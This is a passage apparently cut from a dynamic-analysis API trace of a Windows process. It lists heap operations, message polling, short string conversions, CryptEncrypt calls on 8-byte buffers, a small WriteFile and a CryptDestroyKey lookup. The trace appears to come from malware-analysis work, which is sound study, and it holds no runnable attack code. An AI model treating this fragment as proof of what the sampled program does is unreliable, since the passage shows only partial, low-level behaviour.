hHeap=0x2af0000) returned 1 [0205.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0205.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0205.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0205.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0205.177] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0205.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0205.177] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0205.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0205.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0205.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0205.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0205.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0205.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0205.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0205.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0205.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0205.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0205.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0205.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0205.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0205.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0205.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0205.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0205.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0205.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0205.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0205.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0205.178] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0205.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73b30 | out: hHeap=0x2af0000) returned 1 [0205.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0205.178] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0205.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0205.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0205.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0205.178] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.178] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0205.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0205.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0205.178] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0205.178] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.178] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0205.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0205.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0205.179] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0205.179] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0205.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0205.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0205.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0205.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0205.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0205.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0205.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0205.179] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0205.179] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0205.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0205.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0205.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0205.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0205.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0205.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0205.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0205.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0205.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0205.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0205.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0205.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0205.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0205.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0205.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0205.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0205.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabe8 | out: hHeap=0x2af0000) returned 1 [0205.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac90 | out: hHeap=0x2af0000) returned 1 [0205.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0205.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0205.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0205.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0205.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0205.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0205.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacd8 | out: hHeap=0x2af0000) returned 1 [0205.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabe8 | out: hHeap=0x2af0000) returned 1 [0205.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabb8 | out: hHeap=0x2af0000) returned 1 [0205.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0205.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0205.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0205.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad08 | out: hHeap=0x2af0000) returned 1 [0205.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacd8 | out: hHeap=0x2af0000) returned 1 [0205.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacc0 | out: hHeap=0x2af0000) returned 1 [0205.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0205.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0205.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0205.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadf8 | out: hHeap=0x2af0000) returned 1 [0205.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0205.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0205.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0205.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabb8 | out: hHeap=0x2af0000) returned 1 [0205.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0205.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0205.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0205.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0205.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab70 | out: hHeap=0x2af0000) returned 1 [0205.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0205.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaba0 | out: hHeap=0x2af0000) returned 1 [0205.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0205.181] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab70 | out: hHeap=0x2af0000) returned 1 [0205.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0205.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae10 | out: hHeap=0x2af0000) returned 1 [0205.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0205.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0205.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0205.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac78 | out: hHeap=0x2af0000) returned 1 [0205.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0205.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacd8 | out: hHeap=0x2af0000) returned 1 [0205.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0205.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0205.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0205.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacc0 | out: hHeap=0x2af0000) returned 1 [0205.182] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0205.182] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaacc0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0205.182] CryptEncrypt (in: hKey=0x9e1db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8) returned 1 [0205.182] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.182] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.182] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.182] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.182] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0205.182] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.182] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.182] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0205.182] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.182] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0205.182] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.182] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.182] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0205.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaabb8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0205.183] CryptEncrypt (in: hKey=0x9e1db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a719a8*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x8 | out: pbData=0x2a719a8*, pdwDataLen=0x8cef60*=0x8) returned 1 [0205.183] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.183] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.187] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.187] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.187] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.187] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.187] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.187] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0205.187] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0205.187] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0205.187] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0205.187] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0205.187] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0205.187] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0205.187] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0205.187] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0205.187] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0205.187] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0205.187] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0205.187] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0205.188] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0205.188] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0205.188] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0205.188] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0205.188] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0205.188] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0205.188] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.188] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.188] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.188] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.188] WriteFile (in: hFile=0x44c, lpBuffer=0x2a71898*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a71898*, lpNumberOfBytesWritten=0x8cf5e4*=0x8, lpOverlapped=0x0) returned 1 [0205.189] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.189] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.189] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0205.189] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0205.189] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0205.189] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0205.189] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0205.189] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0205.189] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0205.189] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0205.189] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0205.189] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0205.189] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 